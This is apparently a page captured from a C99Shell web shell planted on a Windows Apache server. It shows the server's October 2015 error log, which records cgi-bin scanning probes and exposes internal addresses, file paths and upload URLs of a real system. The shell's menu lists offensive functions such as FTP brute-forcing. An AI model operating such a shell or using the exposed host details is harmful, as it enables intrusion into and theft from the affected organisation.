!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2015.10.26.log (39.17 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Mon Oct 26 00:27:02.802743 2015] [cgi:error] [pid 11856:tid 15536] [client 115.239.248.245:3697] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Mon Oct 26 02:28:38.174157 2015] [core:error] [pid 11856:tid 15704] [client 108.171.178.73:42785] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Mon Oct 26 02:28:38.704558 2015] [cgi:error] [pid 11856:tid 15644] [client 108.171.178.73:42855] script not found or unable to stat: E:/nuevo/cgi-bin/bash
[Mon Oct 26 02:28:38.907358 2015] [cgi:error] [pid 11856:tid 16012] [client 108.171.178.73:42903] script not found or unable to stat: E:/nuevo/cgi-bin/contact.cgi
[Mon Oct 26 02:28:39.125758 2015] [cgi:error] [pid 11856:tid 15584] [client 108.171.178.73:42940] script not found or unable to stat: E:/nuevo/cgi-bin/defaultwebpage.cgi
[Mon Oct 26 02:28:39.344159 2015] [cgi:error] [pid 11856:tid 15624] [client 108.171.178.73:42983] script not found or unable to stat: E:/nuevo/cgi-bin/env.cgi
[Mon Oct 26 02:28:39.562559 2015] [cgi:error] [pid 11856:tid 15712] [client 108.171.178.73:43016] script not found or unable to stat: E:/nuevo/cgi-bin/fire.cgi
[Mon Oct 26 02:28:39.765359 2015] [cgi:error] [pid 11856:tid 15536] [client 108.171.178.73:43059] script not found or unable to stat: E:/nuevo/cgi-bin/forum.cgi
[Mon Oct 26 02:28:39.983760 2015] [cgi:error] [pid 11856:tid 15920] [client 108.171.178.73:43097] script not found or unable to stat: E:/nuevo/cgi-bin/hello.cgi
[Mon Oct 26 02:28:40.202160 2015] [cgi:error] [pid 11856:tid 15708] [client 108.171.178.73:43129] script not found or unable to stat: E:/nuevo/cgi-bin/index.cgi
[Mon Oct 26 02:28:40.420561 2015] [cgi:error] [pid 11856:tid 15604] [client 108.171.178.73:43165] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Mon Oct 26 02:28:40.638961 2015] [cgi:error] [pid 11856:tid 15524] [client 108.171.178.73:43198] script not found or unable to stat: E:/nuevo/cgi-bin/main.cgi
[Mon Oct 26 02:28:40.841761 2015] [cgi:error] [pid 11856:tid 15704] [client 108.171.178.73:43248] script not found or unable to stat: E:/nuevo/cgi-bin/meme.cgi
[Mon Oct 26 02:28:41.060162 2015] [cgi:error] [pid 11856:tid 15676] [client 108.171.178.73:43293] script not found or unable to stat: E:/nuevo/cgi-bin/php
[Mon Oct 26 02:28:41.262962 2015] [cgi:error] [pid 11856:tid 15644] [client 108.171.178.73:43332] script not found or unable to stat: E:/nuevo/cgi-bin/php4
[Mon Oct 26 02:28:41.481363 2015] [cgi:error] [pid 11856:tid 16012] [client 108.171.178.73:43371] script not found or unable to stat: E:/nuevo/cgi-bin/php5
[Mon Oct 26 02:28:41.699763 2015] [cgi:error] [pid 11856:tid 15584] [client 108.171.178.73:43397] script not found or unable to stat: E:/nuevo/cgi-bin/php5-cli
[Mon Oct 26 02:28:41.918163 2015] [cgi:error] [pid 11856:tid 15624] [client 108.171.178.73:43465] script not found or unable to stat: E:/nuevo/cgi-bin/recent.cgi
[Mon Oct 26 02:28:42.136564 2015] [cgi:error] [pid 11856:tid 15712] [client 108.171.178.73:43500] script not found or unable to stat: E:/nuevo/cgi-bin/sat-ir-web.pl
[Mon Oct 26 02:28:42.557764 2015] [cgi:error] [pid 11856:tid 15920] [client 108.171.178.73:43593] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi
[Mon Oct 26 02:28:42.776165 2015] [cgi:error] [pid 11856:tid 15708] [client 108.171.178.73:43650] script not found or unable to stat: E:/nuevo/cgi-bin/test.cgi
[Mon Oct 26 02:28:42.978965 2015] [cgi:error] [pid 11856:tid 15604] [client 108.171.178.73:43693] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi.pl
[Mon Oct 26 02:28:43.197366 2015] [cgi:error] [pid 11856:tid 15524] [client 108.171.178.73:43727] script not found or unable to stat: E:/nuevo/cgi-bin/test.sh
[Mon Oct 26 02:28:43.400166 2015] [cgi:error] [pid 11856:tid 15704] [client 108.171.178.73:43771] script not found or unable to stat: E:/nuevo/cgi-bin/tools
[Mon Oct 26 05:09:16.466886 2015] [core:error] [pid 11856:tid 15612] (20024)The given path is misformatted or contained invalid characters: [client 168.61.154.160:48068] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file
[Mon Oct 26 06:06:18.786297 2015] [mpm_winnt:warn] [pid 11856:tid 16536] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 06:23:08.108069 2015] [proxy_http:error] [pid 11856:tid 15584] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.25.96.44:62778] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 06:23:08.108069 2015] [proxy:error] [pid 11856:tid 15584] [client 190.25.96.44:62778] AH00898: Error reading from remote server returned by /isolucionsda/g/Img_LogoIsoCabezote.jpg, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 06:23:08.810071 2015] [proxy_http:error] [pid 11856:tid 15708] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.25.96.44:62779] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 06:23:08.810071 2015] [proxy:error] [pid 11856:tid 15708] [client 190.25.96.44:62779] AH00898: Error reading from remote server returned by /isolucionsda/g/shim.gif, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 06:58:54.610440 2015] [proxy_http:error] [pid 11856:tid 15548] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.123.250:14251] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 06:58:54.610440 2015] [proxy:error] [pid 11856:tid 15548] [client 186.29.123.250:14251] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 06:58:55.000440 2015] [proxy_http:error] [pid 11856:tid 15512] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.123.250:14255] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Oct 26 06:58:55.000440 2015] [proxy:error] [pid 11856:tid 15512] [client 186.29.123.250:14255] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Siguiente.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Oct 26 07:11:50.774203 2015] [mpm_winnt:warn] [pid 11856:tid 16536] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 07:14:53.965325 2015] [proxy_http:error] [pid 11856:tid 15548] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56060] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Mon Oct 26 07:15:44.478213 2015] [proxy_http:error] [pid 11856:tid 15712] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56423] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/bancoconocimiento/G/GESTIONDOCUMENTAL_v7/GESTIONDOCUMENTAL_v7.asp?IdArticulo=6836
[Mon Oct 26 07:15:44.478213 2015] [proxy:error] [pid 11856:tid 15712] [client 201.245.192.253:56423] AH00898: Error reading from remote server returned by /IsolucionSDA/g/vacio1x1.gif, referer: http://190.27.245.106/IsolucionSDA/bancoconocimiento/G/GESTIONDOCUMENTAL_v7/GESTIONDOCUMENTAL_v7.asp?IdArticulo=6836
[Mon Oct 26 07:57:07.239174 2015] [proxy_http:error] [pid 11856:tid 15512] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:37869] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 07:57:07.239174 2015] [proxy:error] [pid 11856:tid 15512] [client 201.245.192.253:37869] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 08:01:29.865635 2015] [proxy_http:error] [pid 11856:tid 15440] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:40309] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Mon Oct 26 08:01:29.865635 2015] [proxy:error] [pid 11856:tid 15440] [client 201.245.192.253:40309] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Mon Oct 26 08:48:06.747748 2015] [proxy_http:error] [pid 11856:tid 15536] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56309] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Arriba.asp?Pagina=/IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp?IdArticulo=5564
[Mon Oct 26 08:48:06.747748 2015] [proxy:error] [pid 11856:tid 15536] [client 201.245.192.253:56309] AH00898: Error reading from remote server returned by /IsolucionSDA/g/icono_alerta.jpg, referer: http://190.27.245.106/IsolucionSDA/Arriba.asp?Pagina=/IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp?IdArticulo=5564
[Mon Oct 26 08:48:06.747748 2015] [proxy_http:error] [pid 11856:tid 15584] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56307] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Arriba.asp?Pagina=/IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp?IdArticulo=5564
[Mon Oct 26 08:48:06.747748 2015] [proxy:error] [pid 11856:tid 15584] [client 201.245.192.253:56307] AH00898: Error reading from remote server returned by /IsolucionSDA/StyleSheet.css, referer: http://190.27.245.106/IsolucionSDA/Arriba.asp?Pagina=/IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp?IdArticulo=5564
[Mon Oct 26 08:48:07.324949 2015] [proxy_http:error] [pid 11856:tid 15540] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56304] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp?IdArticulo=5564
[Mon Oct 26 08:48:07.324949 2015] [proxy:error] [pid 11856:tid 15540] [client 201.245.192.253:56304] AH00898: Error reading from remote server returned by /IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/F/FORMATOENTREGADEDEVOLUCIONESANEXO3/FORMATOENTREGADEDEVOLUCIONESANEXO3.asp?IdArticulo=5564
[Mon Oct 26 08:48:28.167586 2015] [proxy_http:error] [pid 11856:tid 15920] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56557] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/BancoConocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Mon Oct 26 09:25:50.952325 2015] [cgi:error] [pid 11856:tid 15712] [client 115.239.248.245:2452] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Mon Oct 26 09:32:57.862675 2015] [proxy_http:error] [pid 11856:tid 15540] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:48484] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGlosario.asp?Termino=Correspondencia+de+Salida
[Mon Oct 26 09:33:02.651883 2015] [proxy_http:error] [pid 11856:tid 15920] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:48732] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGlosario.asp?Termino=Correspondencia+Interna
[Mon Oct 26 09:33:02.651883 2015] [proxy:error] [pid 11856:tid 15920] [client 201.245.192.253:48732] AH00898: Error reading from remote server returned by /IsolucionSDA/GlosarioRelacionado.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGlosario.asp?Termino=Correspondencia+Interna
[Mon Oct 26 11:28:02.811203 2015] [mpm_winnt:warn] [pid 17868:tid 260] AH00445: ThreadsPerChild of 2500 exceeds ThreadLimit of 1920, decreasing to match
[Mon Oct 26 11:28:02.858003 2015] [core:warn] [pid 17868:tid 260] AH00098: pid file E:/nuevo/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon Oct 26 11:28:02.858003 2015] [auth_digest:notice] [pid 17868:tid 260] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:28:02.982803 2015] [mpm_winnt:notice] [pid 17868:tid 260] AH00455: Apache/2.4.10 (Win32) OpenSSL/1.0.1i configured -- resuming normal operations
[Mon Oct 26 11:28:02.982803 2015] [mpm_winnt:notice] [pid 17868:tid 260] AH00456: Apache Lounge VC11 Server built: Jul 17 2014 11:50:08
[Mon Oct 26 11:28:02.982803 2015] [core:notice] [pid 17868:tid 260] AH00094: Command line: 'e:\\nuevo\\apache\\bin\\httpd.exe -d E:/nuevo/apache'
[Mon Oct 26 11:28:02.982803 2015] [mpm_winnt:notice] [pid 17868:tid 260] AH00418: Parent: Created child process 13356
AH00548: NameVirtualHost has no effect and will be removed in the next release E:/nuevo/apache/conf/extra/httpd-vhosts.conf:44
[Mon Oct 26 11:28:03.638004 2015] [auth_digest:notice] [pid 13356:tid 272] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:28:03.794004 2015] [mpm_winnt:notice] [pid 13356:tid 272] AH00354: Child: Starting 1920 worker threads.
[Mon Oct 26 11:32:59.165923 2015] [proxy_http:error] [pid 13356:tid 15652] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:56900] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:32:59.165923 2015] [proxy_http:error] [pid 13356:tid 15652] [client 201.245.192.253:56900] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:00.803926 2015] [proxy_http:error] [pid 13356:tid 15652] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57796] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:00.803926 2015] [proxy_http:error] [pid 13356:tid 15652] [client 201.245.192.253:57796] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:03.799131 2015] [proxy_http:error] [pid 13356:tid 15996] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57797] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:03.799131 2015] [proxy_http:error] [pid 13356:tid 15996] [client 201.245.192.253:57797] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:03.861532 2015] [proxy_http:error] [pid 13356:tid 15968] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57921] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:03.861532 2015] [proxy_http:error] [pid 13356:tid 15968] [client 201.245.192.253:57921] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:03.986332 2015] [proxy_http:error] [pid 13356:tid 15716] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57922] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:03.986332 2015] [proxy_http:error] [pid 13356:tid 15716] [client 201.245.192.253:57922] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:04.157932 2015] [proxy_http:error] [pid 13356:tid 15968] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57930] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:04.157932 2015] [proxy_http:error] [pid 13356:tid 15968] [client 201.245.192.253:57930] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:06.107935 2015] [proxy_http:error] [pid 13356:tid 15996] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57931] AH02609: read request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:33:06.107935 2015] [proxy_http:error] [pid 13356:tid 15996] [client 201.245.192.253:57931] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/ISOlucionSDA//Administracion/Upload/Upload.asp?Id_Articulo=6068&UPLDQuerystring=Id_Articulo=6068&UPLDMODO=SubirArchivoADocumento&UPLDRuta=E:\\Isolucion\\Web\\BancoConocimiento\\1\\10808OPACIMETRODEFLUJOPARCIAL\\&UPLDAtras=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 11:34:11.175650 2015] [mpm_winnt:warn] [pid 9000:tid 260] AH00445: ThreadsPerChild of 2500 exceeds ThreadLimit of 1920, decreasing to match
[Mon Oct 26 11:34:11.222450 2015] [core:warn] [pid 9000:tid 260] AH00098: pid file E:/nuevo/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon Oct 26 11:34:11.222450 2015] [auth_digest:notice] [pid 9000:tid 260] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:34:11.347250 2015] [mpm_winnt:notice] [pid 9000:tid 260] AH00455: Apache/2.4.10 (Win32) OpenSSL/1.0.1i configured -- resuming normal operations
[Mon Oct 26 11:34:11.347250 2015] [mpm_winnt:notice] [pid 9000:tid 260] AH00456: Apache Lounge VC11 Server built: Jul 17 2014 11:50:08
[Mon Oct 26 11:34:11.347250 2015] [core:notice] [pid 9000:tid 260] AH00094: Command line: 'e:\\nuevo\\apache\\bin\\httpd.exe -d E:/nuevo/apache'
[Mon Oct 26 11:34:11.362850 2015] [mpm_winnt:notice] [pid 9000:tid 260] AH00418: Parent: Created child process 16152
AH00548: NameVirtualHost has no effect and will be removed in the next release E:/nuevo/apache/conf/extra/httpd-vhosts.conf:44
[Mon Oct 26 11:34:12.002451 2015] [auth_digest:notice] [pid 16152:tid 272] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:34:12.127251 2015] [mpm_winnt:notice] [pid 16152:tid 272] AH00354: Child: Starting 1920 worker threads.
[Mon Oct 26 11:46:03.270100 2015] [mpm_winnt:warn] [pid 17908:tid 260] AH00445: ThreadsPerChild of 2500 exceeds ThreadLimit of 1920, decreasing to match
[Mon Oct 26 11:46:03.316901 2015] [core:warn] [pid 17908:tid 260] AH00098: pid file E:/nuevo/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon Oct 26 11:46:03.316901 2015] [auth_digest:notice] [pid 17908:tid 260] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:46:03.457301 2015] [mpm_winnt:notice] [pid 17908:tid 260] AH00455: Apache/2.4.10 (Win32) OpenSSL/1.0.1i configured -- resuming normal operations
[Mon Oct 26 11:46:03.457301 2015] [mpm_winnt:notice] [pid 17908:tid 260] AH00456: Apache Lounge VC11 Server built: Jul 17 2014 11:50:08
[Mon Oct 26 11:46:03.457301 2015] [core:notice] [pid 17908:tid 260] AH00094: Command line: 'e:\\nuevo\\apache\\bin\\httpd.exe -d E:/nuevo/apache'
[Mon Oct 26 11:46:03.457301 2015] [mpm_winnt:notice] [pid 17908:tid 260] AH00418: Parent: Created child process 19768
AH00548: NameVirtualHost has no effect and will be removed in the next release E:/nuevo/apache/conf/extra/httpd-vhosts.conf:44
[Mon Oct 26 11:46:04.096902 2015] [auth_digest:notice] [pid 19768:tid 272] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:46:04.237302 2015] [mpm_winnt:notice] [pid 19768:tid 272] AH00354: Child: Starting 1920 worker threads.
[Mon Oct 26 11:48:44.028383 2015] [mpm_winnt:crit] [pid 19768:tid 272] AH02538: Child: Parent process exited abruptly. Child process is ending
[Mon Oct 26 11:49:00.673612 2015] [mpm_winnt:warn] [pid 13780:tid 260] AH00445: ThreadsPerChild of 2500 exceeds ThreadLimit of 1920, decreasing to match
